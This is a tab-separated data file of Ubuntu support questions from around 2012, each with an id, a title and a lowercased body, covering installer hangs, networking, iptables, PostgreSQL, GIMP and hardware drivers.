136886	ca n't add images on maas cloud	i have been following this guide : https : //help.ubuntu.com/community/ubuntucloudinfrastructure # deploying_ubuntu_cloud_infrastructure_with_juju everything goes well until almost end of guide is part : ec2 api to begin using the ec2 api , select settings- > ec2 credentials - > download ec2 credentials in the openstack dashboard . save the file ( eg , /home/adam/openstack/ '' ) . we can then unzip these and begin using our cloud : cd /home/adam/openstack unzip 247e0c5de9dc415a8e411da643308eb6d-x509.zip . ec2rc.sh wget http : //uec-images.ubuntu.com/server/server/releases/oneiric/beta-1/ubuntu-11.10-beta1-server-cloudimg-amd64.tar.gz uec-publish-tarball ./ubuntu-11.10-beta1-server-cloudimg-amd64.tar.gz images euca-add-keypair adam > adam.pk euca-run-instances -k adam ami-00000002 problem starts here : uec-publish-tarball ./ubuntu-11.10-beta1-server-cloudimg-amd64.tar.gz images . i did found that it is cloud-publish-tarball , but even with that i get only this : unable to run euca -- describe-images . is environment for euca- set up ? so my question is how i can add images ? i have used to creds , tried many different places / machines when doing this ... but always same problem .
136890	how do i customize the launcher animations ?	when i get skype messages i tend not to notice the launcher animation . the highlighted icon is then not enough to catch my attention once the animation is done . although i agree with the default here , is there a way i can make the animation continuous until i click it ?
136895	12.04 installation stuck	i am trying to install 12.04 amd64 on gateway laptop from an usb drive . the drive boots fine and i can use the live distro . but when i try to install it , it hangs and the small `` terminal '' pane below the status displays : may 14 16:14:18 ubuntu kernel : [ 891.776455 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:14:18 ubuntu kernel : [ 891.776462 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through the funny thing is i am trying to install to sda4 and sdc is the usb drive . over and over again the full output is : may 14 16:02:41 ubuntu ubiquity [ 3173 ] : log-output -t ubiquity setxkbmap -model pc105 -layout us -option home directory /home/ubuntu not ours . home directory /home/ubuntu not ours . may 14 16:02:51 ubuntu ubiquity : your console font configuration will be updated the next time your system may 14 16:02:51 ubuntu ubiquity : boots . if you want to update it now , run 'setupcon ' from a virtual console . may 14 16:02:51 ubuntu ubiquity [ 3173 ] : log-output -t ubiquity setxkbmap -model pc105 -layout us -option may 14 16:02:51 ubuntu ubiquity [ 3173 ] : debconffilter_done : ubi-console-setup ( current : ubi-console-setup ) may 14 16:02:51 ubuntu ubiquity [ 3173 ] : step_before = stepkeyboardconf may 14 16:02:51 ubuntu ubiquity [ 3173 ] : switched to page usersetup may 14 16:03:02 ubuntu kernel : [ 215.774214 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:03:02 ubuntu kernel : [ 215.775711 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:03:02 ubuntu kernel : [ 215.775718 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through home directory /home/ubuntu not ours . home directory /home/ubuntu not ours . home directory /home/ubuntu not ours . home directory /home/ubuntu not ours . may 14 16:03:22 ubuntu ubiquity [ 3173 ] : debconffilter_done : ubi-usersetup ( current : ubi-usersetup ) may 14 16:03:22 ubuntu ubiquity [ 3173 ] : step_before = stepuserinfo may 14 16:03:23 ubuntu ubiquity [ 3173 ] : switched to page webcam home directory /home/ubuntu not ours . home directory /home/ubuntu not ours . home directory /home/ubuntu not ours . may 14 16:03:27 ubuntu ubiquity [ 3173 ] : step_before = stepwebcam may 14 16:03:27 ubuntu migration-assistant : info : setting ostype from : '/dev/sda1 : windows recovery environment ( loader ) : windows : chain' may 14 16:03:27 ubuntu migration-assistant : info : got ostype of : 'windowsxp ' , mountpoint is : '/mnt/migrationassistant' may 14 16:03:27 ubuntu ntfs-3g [ 11057 ] : version 2012.1.15ar.1 external fuse 28 may 14 16:03:27 ubuntu ntfs-3g [ 11057 ] : mounted /dev/sda1 ( read-write , label `` recovery '' , ntfs 3.1 ) may 14 16:03:27 ubuntu ntfs-3g [ 11057 ] : cmdline options : rw , umask=0022 , nls=utf8 may 14 16:03:27 ubuntu ntfs-3g [ 11057 ] : mount options : rw , nls=utf8 , allow_other , nonempty , relatime , default_permissions , fsname=/dev/sda1 , blkdev , blksize=4096 may 14 16:03:27 ubuntu ntfs-3g [ 11057 ] : global ownership and permissions enforced , configuration type 7 profilesdir : /mnt/migrationassistant/users may 14 16:03:27 ubuntu ntfs-3g [ 11057 ] : unmounting /dev/sda1 ( recovery ) may 14 16:03:27 ubuntu migration-assistant : info : setting ostype from : '/dev/sda2 : windows vista ( loader ) : windows1 : chain' may 14 16:03:27 ubuntu migration-assistant : info : got ostype of : 'windowsxp ' , mountpoint is : '/mnt/migrationassistant' may 14 16:03:28 ubuntu ntfs-3g [ 11088 ] : version 2012.1.15ar.1 external fuse 28 may 14 16:03:28 ubuntu ntfs-3g [ 11088 ] : mounted /dev/sda2 ( read-write , label `` partition_1 '' , ntfs 3.1 ) may 14 16:03:28 ubuntu ntfs-3g [ 11088 ] : cmdline options : rw , umask=0022 , nls=utf8 may 14 16:03:28 ubuntu ntfs-3g [ 11088 ] : mount options : rw , nls=utf8 , allow_other , nonempty , relatime , default_permissions , fsname=/dev/sda2 , blkdev , blksize=4096 may 14 16:03:28 ubuntu ntfs-3g [ 11088 ] : global ownership and permissions enforced , configuration type 7 profilesdir : /mnt/migrationassistant/users profilesdir : /mnt/migrationassistant/users may 14 16:03:29 ubuntu ntfs-3g [ 11088 ] : unmounting /dev/sda2 ( partition_1 ) may 14 16:03:29 ubuntu ubiquity [ 3173 ] : migration-assistant : filtering out windows recovery environment ( loader ) ( /dev/sda1 ) as it has no users may 14 16:03:29 ubuntu ubiquity [ 3173 ] : switched to page migrationassistant home directory /home/ubuntu not ours . home directory /home/ubuntu not ours . may 14 16:03:36 ubuntu ubiquity [ 3173 ] : debconffilter_done : ubi-migrationassistant ( current : ubi-migrationassistant ) may 14 16:03:36 ubuntu ubiquity [ 3173 ] : step_before = stepmigrationassistant may 14 16:03:54 ubuntu kernel : [ 267.775114 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:03:54 ubuntu kernel : [ 267.776626 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:03:54 ubuntu kernel : [ 267.776634 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:04:46 ubuntu kernel : [ 319.773862 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:04:46 ubuntu kernel : [ 319.775368 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:04:46 ubuntu kernel : [ 319.775375 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:05:38 ubuntu kernel : [ 371.774882 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:05:38 ubuntu kernel : [ 371.776382 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:05:38 ubuntu kernel : [ 371.776389 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:05:58 ubuntu aptdaemon : info : quitting due to inactivity may 14 16:05:58 ubuntu aptdaemon : info : quitting was requested may 14 16:06:30 ubuntu kernel : [ 423.772265 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:06:30 ubuntu kernel : [ 423.773750 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:06:30 ubuntu kernel : [ 423.773756 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:07:22 ubuntu kernel : [ 475.775284 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:07:22 ubuntu kernel : [ 475.776745 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:07:22 ubuntu kernel : [ 475.776753 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:08:14 ubuntu kernel : [ 527.774901 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:08:14 ubuntu kernel : [ 527.776380 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:08:14 ubuntu kernel : [ 527.776388 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:09:06 ubuntu kernel : [ 579.774926 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:09:06 ubuntu kernel : [ 579.776391 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:09:06 ubuntu kernel : [ 579.776399 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:09:58 ubuntu kernel : [ 631.774936 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:09:58 ubuntu kernel : [ 631.776402 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:09:58 ubuntu kernel : [ 631.776409 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:10:50 ubuntu kernel : [ 683.776325 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:10:50 ubuntu kernel : [ 683.777800 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:10:50 ubuntu kernel : [ 683.777807 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:11:42 ubuntu kernel : [ 735.773686 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:11:42 ubuntu kernel : [ 735.775181 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:11:42 ubuntu kernel : [ 735.775188 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:12:34 ubuntu kernel : [ 787.776954 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:12:34 ubuntu kernel : [ 787.778442 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:12:34 ubuntu kernel : [ 787.778449 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:12:36 ubuntu kernel : [ 789.120079 ] usb 2-5 : reset high-speed usb device number 3 using ehci_hcd may 14 16:13:26 ubuntu kernel : [ 839.775467 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:13:26 ubuntu kernel : [ 839.776944 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:13:26 ubuntu kernel : [ 839.776952 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:14:18 ubuntu kernel : [ 891.774992 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:14:18 ubuntu kernel : [ 891.776455 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:14:18 ubuntu kernel : [ 891.776462 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:15:10 ubuntu kernel : [ 943.776467 ] sd 6:0:0:0 : [ sdc ] test wp failed , assume write enabled may 14 16:15:10 ubuntu kernel : [ 943.777958 ] sd 6:0:0:0 : [ sdc ] asking for cache data failed may 14 16:15:10 ubuntu kernel : [ 943.777962 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through may 14 16:15:28 ubuntu kernel : [ 961.120067 ] usb 2-5 : reset high-speed usb device number 3 using ehci_hcd
136898	how do i get a huawei e1550 dongle working ?	i need help making my e1550 dongle work on ubuntu 12.04 . when i connect the dongle to my laptop , it is recognized by the network-manager and is listed as one of the options . but each time i try to connect , it instantly disconnects . does anyone know how i can make the dongle work ?
136903	ubuntu 12.04 orange hex name ( it 's not # dd4814 )	change to bright blue and now wan na change back to default with the command : gsettings set org.gnome.desktop.interface gtk-color-scheme 'selected_bg_color : hexname ; ' i used this site to get some names : http : //www.2createawebsite.com/build/hex-colors.html but what is the default hex ? thanks !
136909	file durability in global directories	it seems to me that some files i write to global directories such as /usr are not persistent . concretely i experience that the installation of some self-compiled software ( webkit-qt ) to global directories is broken after some time until i reinstall it . the relevant webkit installation is installed by the package management at the same time to fullfill dependencies . so each time i install i certainly overwrite some of these files . please do n't tell me that this is not nice to do . i am aware of it . i am just wondering if there is some mechanism in ubuntu which restores the old version of the files ( other than the package management if i reinstall some package of course ) !
136911	run a postgresql instance locally	i 'm trying to follow this tutorial , but at the beginning it says to run a postgresql instance `` locally '' instead of as a daemon using the following commands . $ initdb pg $ postgres -d pg & $ createdb shouter so i 've got a new 12.04 install ( vmware on win7 , if that matters ) and did under my login : $ sudo apt-get install postgresql $ initdb pg $ postgres -d pg this gives me an error saying : log : could not bind ipv4 socket : address already in use hint : is another postmaster already running on port 5432 ? if not , wait a few seconds and retry . warning : could not create listen socket for `` localhost '' fatal : could not create any tcp/ip sockets i figure this means installing the server caused it to run the daemon automatically . i 'd prefer just running on the default port like in the tutorial , but i tried running a different port anyway : $ postgres -d pg -p 5555 fatal : could not create lock file `` /var/run/postgresql/.s.pgsql.5555.lock '' : permission denied i 've followed various other examples on different ways to install postgresql but all to no avail . how do i get past this error so that postgres -d pg can execute successfully ? *note i 'm perfectly willing to create a brand new vm , so if you 've got instructions on how to do this with a fresh install , that 'd be terrific .
136917	unable to save resume file . too many open files	every time i am getting unable to save resume file . too many open files error in transmission application . i got solution in this post . sudo sh -c `` echo fs.file-max= $ ( dc -e '2 20 ^ p ' ) > /etc/sysctl.d/file-descriptors-max.conf '' sudo service procps restart but sudo service procps restart output : stop : unknown instance : procps stop/waiting can anyone please help me out ? i am using ubuntu 12.04 lts .
136918	different profiles for sound mixer ?	i 'd like to switch between different ubuntu sound mixer profiles , depending on what sound hardware i plug in or wirelessly activate . the easiest way i think i can do this would be to have a script for each profile , which sets the hardware and volume levels . would alsa be the program i 'd be writing a script for ? or would it be for something else ? or is it pulse audio ? i 'm kinda confused . thanks .
136919	upgrade to 12.04 lts from 11.10	i initiated an upgrade to 12.04 from 11.10 . the upgrade manager had completed package download and installation but was killed before the cleanup phase started . ubuntu 12.04 is now loaded but occassional errors exist . should i do a reinstall from scratch or is there a way to reactivate the update manager to properly complete the installation ? thanks , ... tom
136922	audio player with lyrics loaded from file	i 'm looking for an audio player ( may be for gnome , kde , xfce , does n't matter ) in which i 'd be able to load my own lyrics from a file . i have some language-learning podcasts and would like to have a transcript for them to automatically appear when the track changes . i 've been searching quite thoroughly and could n't find any player that would load lyrics from a file , all of them search the web to find the lyrics ( i 've even tried the heavy amarok ) and it obviously wo n't work for a podcast . thank you for you help ! edit : ok , i 've found a great player ! actually enigmapond recommended it to me on ubuntuforums : http : //ubuntuforums.org/showthread.php ? t=1980046 it 's named guayadeque and you can read about it 's advantages i 've immediately noticed in the thread i 've posted .
136925	how do i format my ubuntu partition ( ext4 ) and keep my windows partition ?	i want my old family pc to use only windows xp now that i do n't use it anymore . however , i have a 200gb ext4 partition , containing ubuntu . windows does not detect ext4 . i also do n't want it booting into grub : i want it to boot directly into windows xp . how do i do it ?
136926	extend partition with unallocated space	my linux partition is 18 gigabytes . i managed to shrink 7 gigs of other partition . now i want to add those 7 gigs to the linux partition . with my disk utility , its not possible . is there another way to do this ?
136928	how do i create and modify application launchers in the unity dash in 12.04 ?	i want to add commands to the unity dash and the launcher , so that i can can press super and type the name of my command to launch it , or click on the left launcher icon , or use kupfer to launch it . surprisingly , i ca n't figure out how to do this . in previous ubuntu versions , there was a settings app called `` main menu '' where you could edit the list of programs .
136930	lost power while upgrading ubuntu	my pc ( dual booting windows ) lost power while i was updating ubuntu . now , when i start the computer and enter ubuntu , i get a blank screen with a blinking cursor . how can i fix the botched install ?
136937	i see a dialog box `` i ca n't find a system tray '' when launching mediafire express	on start up i see a dialog box saying '' i ca n't find a system tray '' on startup although there is a system tray displayed . i have tried deleting the compiz folder . what 's the fix ? i am using ubuntu 12.04 on an amd 64 intel i5
136942	extend desktop to monitor over lan	i want to make use of an old laptop by extending my the desktop from my main pc onto the monitor of this other , old laptop over a lan connection . i 've looked into xdmx/dmx , but the project seems to have been dead for a while . are there any other alternatives or will i have to cobble my own script together ?
136944	everything is slow after installing	i took the leap today . downloaded 12.04 lts , burned the iso to a cd rom . first i clicked the `` try it out '' option . then i installed it on my hp pavilion dv2000 . first time it started up , i downloaded some drivers , since there was no wifi driver working . also updated 2 nvidia drivers . it told me it needed to restart . so i restarted ... when booting up it takes a looong time . finally i can type in my password . it shows me the default background and nothing else . after about 30 seconds the background image sort of disolves . then come back . i wait around 5 - 10 minutes . nothing happens at all.. just the orange default background . i hold down the power button . booting up again . same deal sort of . first i get to enter my password really quick . hit enter . default background image and mouse cursor icon . nothing else happens . i wait for about 5 minutes , still nothing happens . i try right clicking . aha ! i can create a new folder and change background . basically the standard ubuntu right click on desktop menu . but the folder window and settings and everything else has no top navigation . like expand , minimize or the `` x '' close folder icon . i look around what i can access , and i see that i have 130 updates . that could fix it i think to my self . update all.. still the same thing . i kinda went all in and choose to only boot ubuntu . no windows or anything else , so can anyone give some tips on what i could try to fix it ?
136954	none of the tools in the gimp 2.8 toolbox are functional	i am running ubuntu 12.04 lts on a 64bit machine . i recently upgraded to gimp 2.8 with no problems . all user interface items appear to work - except - none of the tools in the toolbox are functional . attempts to crop , move , brush , etc . change the cursor but perform no action . i went to the .gimp-2.8 file ( in home ) and found all files to be empty . i then went to /usr/share/gimp and found files under gimp 2.0 and tried copying them to the .gimp-2.8 file but with no luck . all file/folder paths listed in preferences are correct , and i have had no luck finding any info at gimp hq or using google . can you help me find my missing tools , i have no idea if they were misfiled or simply not installed . all the gimp-2.8 files are there in the home folder but they are 0 files ... ...
136955	wd external usb 3.0 not detected on asus g73jw , works on usb 2.0 and works in windows on 3.0	i have a wd usb 3.0 3tb my book essential and when i connect it to my laptop 's usb 3.0 port nothing happens . it works fine on windows 7 , and it is detected properly in ubuntu if i use a usb 2.0 port . i 'm guessing it 's the usb 3.0 controller that is n't working but do n't know how to tell . from another answer i saw people were using this command to list usb devices . first command is with the drive connected to the usb2.0 port , second one is while drive is connected to the 3.0 port : codyloco @ codyloco-ubuntu : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 13d3:5122 imc networks bus 001 device 004 : id 0b05:1788 asustek computer , inc . bus 002 device 003 : id 046d : c066 logitech , inc . bus 002 device 004 : id 1058:1140 western digital technologies , inc. codyloco @ codyloco-ubuntu : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 13d3:5122 imc networks bus 001 device 004 : id 0b05:1788 asustek computer , inc . bus 002 device 003 : id 046d : c066 logitech , inc. would there be a way to force-display a drive ?
136958	how do i change the color and font of pdf comments in evince ?	evince now handles comments written in other pdf markup software ( e.g . adobe ) , which is very nice . unfortunately , it chooses a yellow font on a white background that is almost impossible to read ( though highlighting the comment with the mouse helps ) . is there any way to change this behavior ? ( adobe 's acroread displays these correctly but is terribly slow and not a native open-source , so i 'd prefer a different alternative ) .
136962	completely upgrading to ubuntu	i am thinking of fully upgrading to ubuntu . i already have it dual booted with windows vista and ubuntu ( only from a cd ) . if i were to completely upgrade to ubuntu . would there be any problems ? im paranoid of upgrading my os so i just want to be sure . edit : i want to be only ubuntu . if i were to install it from the cd would vista be gone ? i want only ubuntu . i can not dual boot on my laptop as there is only one hard drive and i do n't know how to partition .
136963	unity-2d upper panel font distorted	using unity-2d , only when i choose the radiance theme the font in the panel becomes distorted . screenshot
136968	how to make the internal subwoofer work on an asus g73jw ?	i have an asus g73jw laptop which has an internal subwoofer built-in . currently , the system detects the internal speakers as a 2.0 system ( or i can change do 4.0 is the only other option ) . i found a bug report here : https : //bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/673051 which discusses the bug and according to them a fix was sent upstream back at the end of 2010 . i would have thought this would have made it into 12.04 but i guess not ? i tried following the link given at the very bottom to install the latest alsa drivers , here : https : //wiki.ubuntu.com/audio/installinglinuxalsadrivermodules however i keep running into an error when trying to install : sudo apt-get install linux-alsa-driver-modules- $ ( uname -r ) reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-alsa-driver-modules-3.2.0-24-generic e : could n't find any package by regex 'linux-alsa-driver-modules-3.2.0-24-generic' i believe i have added the repository correctly : sudo add-apt-repository ppa : ubuntu-audio-dev/ppa [ sudo ] password for codyloco : you are about to add the following ppa to your system : this ppa will be used to provide testing versions of packages for supported ubuntu releases . more info : https : //launchpad.net/~ubuntu-audio-dev/+archive/ppa press [ enter ] to continue or ctrl-c to cancel adding it executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.7apgzonrqk -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv 4e9f485bf943ef0eaba10b5bd225991a72b194e5 gpg : requesting key 72b194e5 from hkp server keyserver.ubuntu.com gpg : key 72b194e5 : public key `` launchpad ubuntu audio dev team ppa '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) and i also ran an update as well ( followed the instructions on the fix above ) . any ideas ?
136973	iptables problem	hi guys i have the follwoing iptables file for my ubuntu 12.04 server . its a bit messy because i tried different ways to fix it but the problem is it doesnt allow apt commands such as apt-get to run . it shows connecting to archive.ubuntu.com and the connection times out . i guess it has something to do with the outgoing rules but im not sure . the exact same issue appeared with using ufw too . can you please advice me as to how to fix/improve my iptables structure or maybe a fix for ufw to work . thanks ! updated : : completed on mon may 14 23:09:19 2012 # generated by iptables-save v1.4.12 on mon may 14 23:09:19 2012 *filter : input drop [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 0:0 ] -a input -m state -- state related , established -j accept -a input -p tcp -m tcp -- dport 22 -j accept -a input -p tcp -m tcp -- dport 80 -j accept -a input -p tcp -m tcp -- dport 443 -j accept -a input -p tcp -m tcp -- dport 3306 -j accept -a input -s 127.0.0.1/32 -j accept -a input -m limit -- limit 5/min -j log -- log-prefix `` iptables denied '' -- log-level 7 -a input -p icmp -m icmp -- icmp-type 0 -j accept -a input -p icmp -m icmp -- icmp-type 8 -j accept -a input -p tcp -m tcp -- sport 53 -j accept -a input -p udp -m udp -- sport 53 -j accept -a input -i lo -j accept commit # completed on mon may 14 23:09:19 2012
136978	with xmonad / gnome , switch gnome-panel between monitors	i 'm using gnome with xmonad as my window manager on ubuntu 11.10 . when i use a external monitor with my laptop , extending the desktop with either nvidia-settings or disper , the gnome-panels ( top bar and running applications/workspaces bar ) seem to display on either monitor randomly . how can i either force them to use one monitor or change their position with a scriptable command that i can hot-key ? here are things that do n't work : i can move them by right click- > properties- > uncheck `` expand '' - > alt-drag , etc . this works , but requires way too much mouse-work every time i plug in my external monitor . using gconf-editor to change any of the gnome-panel settings does n't actually change anything : gconftool-2 -- type string -- set /apps/panel/toplevels/top_panel_screen0/orientation top the /monitor `` 1 '' setting also does n't change anything [ edit ] gpoo 's solution is almost correct - just use dconf instead of gsettings . dconf write /org/gnome/gnome-panel/layout/toplevels/bottom-panel/monitor 1 gsettings does n't let me change the required keys , though it 's likely i just ca n't understand its cryptic and undocumented syntax . all of dconf , dconf-editor , and gsettings need man pages . ( gsettings 's man page does nothing to explain what the terms mean . )
136985	re installing chrome and flash player	i am having terrible problems with youtube and other sites . i think i need to replace my chrome os and shock wave . ~/.config/google-chrome/default the location of my chrome files - i have no idea how to find this or what to do with it . /usr/lib/flashplugin-installer/libflashplayer.so - my flash player , the same as above .
136990	green filter in video with vlc , mplayer , gnome media player	on ubuntu 12.04 lts 64 bits , when i open a video with vlc , mplayer , gnome media player there is like a green filter . there is the same problem when i open a video in the web browser . this look to be the same symptom than on this post all imported video is green in openshot but i never install openshot . also every think work fine on ms-win . please any idea to fix this ?
136991	gimp too complicated ; pinta/gnupaint/etc . too simple	i 've been looking at a few paint programs , trying to find one that i can use for simple office tasks . gimp is nice when i need layers or cropping , but apart from that it is a total overkill . i know gimp is aimed at photoshop users and it is very powerful - but for simple desktop work it 's too complicated . simple alternatives like gnu paint or pinta are on the other extreme of the scale ; too simple . they seem to be aimed at kids , not office use . what tool can i use for light office/desktop work ? update : features would be things like rectangular selections , cropping , save-as in different formats , scale , flip , rotate , paste from clipboard into new/existing image ...
136992	how to make gimp run as a single window ?	gimp is nice , but the one thing that drives me nuts is that everything floats around in front of each other , often hiding the main window and forcing me to minimize all open windows until i find the one floating window that i am looking for . i 'd like to have the floating windows docked along the edges of that main window , the way practically every other application works . i know this floating thing is one of the things that make gimp special , but it 's not the kind of `` special '' that i like ... i do n't have a huge screen , so it quickly gets too cramped . and i often use gimp briefly , multitasking with other apps , so the many gimp windows are annoying . how can i make gimp run in one window , with everything else inside it ? this is gimp 2.6.11 -- just because that 's what came with my ubuntu 11.10 installation .
137000	chrome removal and replacement	~/.config/google-chrome/default i am not able to find this location . i need to re install chrome as i am having problems with it . please advise me on what to do .
137006	what 's the best way to handle passwords in ubuntu ( application + browser plugin )	i 'm switching from mac os x to ubuntu . on os x , i have 1password as my password application . it comes along with browser plugins to easily fill passwords to web forms . on linux , i 've tested keepass x and keepass 2 . keepass x : is there a browser plugin ? i 'm searching for hours , but nothing realy works . keepass 2 : the browser plugin for firefox does n't work ( only for me ? ) are there any other ways to handle passwords on ubuntu with ease ? edit : it would be nice to have an open source application to store my passwords , which also has a plugin for browsers . i want to avoid the system password manager or firefox password manager
137010	kdesvn context menu	for some reason i no longer have the kdesvn context menu . i 'm pretty sure i did for a while . i used to have it in both konqueror , and the folder menu widget . running kubuntu 12.04 thanks
137011	`` mounting cifs url not implemented yet '' when i try to mount a samba share	i have a server for development ( ubuntu 12.04 ) . on that machine , i have a shared folder named `` projects '' . i tried sudo mount -t smbfs smb : //192.168.2.28/projects/myproject /mnt/myproject on my ubuntu 11.10 and got the error : mounting cifs url not implemented yet . attempt to mount smb : //192.168.2.28/projects/myproject . how can i do to solve it ? i need to mount the folder to use it with netbeans .
137013	how to tell if squid-deb-proxy is working ?	i 've got squid-deb-proxy , avahi-tools , and squid-deb-proxy-client installed on a gateway vm running 12.04 server , and squid-deb-proxy-client installed on two client vms running lubuntu and xubuntu 12.04 . the service appears to be up and running according to htop , and i can see considerable activity when the clients update/upgrade , and i see activity in the log files ... but i 'm not seeing any cache being stored in /var/spool/squid3 - or anywhere else . what should i be looking for to tell if its really working ?
137024	no sound in flash videos	even though i can play flash videos on most sites . it 's been going on . tried to install flash manually and with flash aid help but nothing . i 'm running 12.04 lts , but i had the same problem with 11.10 .
137025	a question on dual booting	i have 2 computers , a desktop and a laptop . on my laptop , i have one hard drive running windows vista . if i were to manage to partition it ( advice would be appreciated ) i will dual boot it . i do not care about any of my files , everything is replaceable . anyway , if i were to partition , would ubuntu automatically install to the partition as a dual boot ?
137027	how to get the 'right click + scroll ' feature of vistaswitcher in ubuntu ?	when using windows i use vistaswitcher to scroll through open windows . i have used compiz to set ctrl+scroll to next and prev windows but i 'd ( ideally ) like something with the ability to see the windows as i scroll . many thanks ! james
137031	ubuntu tweak updates every day . is this correct ?	when i did a fresh install of 12.04 a few weeks ago i run the update manager every day . everyday ubuntu tweak gets updated . i would n't mind but nothing seems to change in the application . the first few days i thought there was back-end stuff getting updated . is it possible for one application to have updates everyday ( the version number is always the same ) , or maybe there is something wrong with the installation ? my current verson is 0.7.2 . this is what i used when i originally installed it sudo add-apt-repository ppa : tualatrix/ppa sudo apt-get update sudo apt-get install ubuntu-tweak
137036	be able to create edit and move files to and from /var/www	i have installed lamp on ubuntu 12.04 . i try to access /var/www but it does n't allow me to do anything as it says i do n't have permissions . i have tried : 1. gksudo nautilus - which works but its very inconvenient way of doing things . 2. sudo adduser ryan www-data sudo chown -r www-data : www-data /var/www sudo chmod g+rw /var/www the above did n't work . i have googled and searched this site for a solution , but all the existing possible solutions have not worked .
137037	networkmanager not populating resolv.conf	i recently upgraded from 11.10 to 12.04 , and now networkmanager is n't populating /etc/resolv.conf when connecting to wireless networks , when it had been working perfectly in 11.10 . i 'm not seeing any explicit errors in either the nm ui or in syslog . how do i diagnose what 's wrong ? edit : if i try to run resolvconf , i get the error `` resolvconf : error : /etc/resolv.conf is n't a symlink , not doing anything . '' what should it be a symlink to and/or how do i get nm to populate it ? this says the symlink should point to /run/resolvconf/resolv.conf , but that file does not exist on my system .
137038	how to play html5 or flash games offilne in ubuntu ?	i have noticed that there are some very rich htlm5 games now , simply looking in the chrome store you can see many . and there are a handful of great flash games . is it possible to download html5 or flash games and play them offline in ubuntu ? for example , i setup an angry birds launcher in unity , but i can only play it online . would be great to know , thank you !
137039	prevent usb tethered device from claiming default route ?	i 'm tethering an android device over usb . when tether is accomplished , the device sets the usb0 interface as the default route . i do not want this ( usually , the host device has wlan0 ) but do not see a simple way to change in ubuntu . dhcpcd does not have the -- nohook option and -- nogateway also does n't seem to work in this case . 'route del ' and 'route add ' can obviously be used , but are quite ... .. a hardcoded solution , since they require the actual ips etc . any ideas ? tia . no solution so far -- could obviously be scripted .
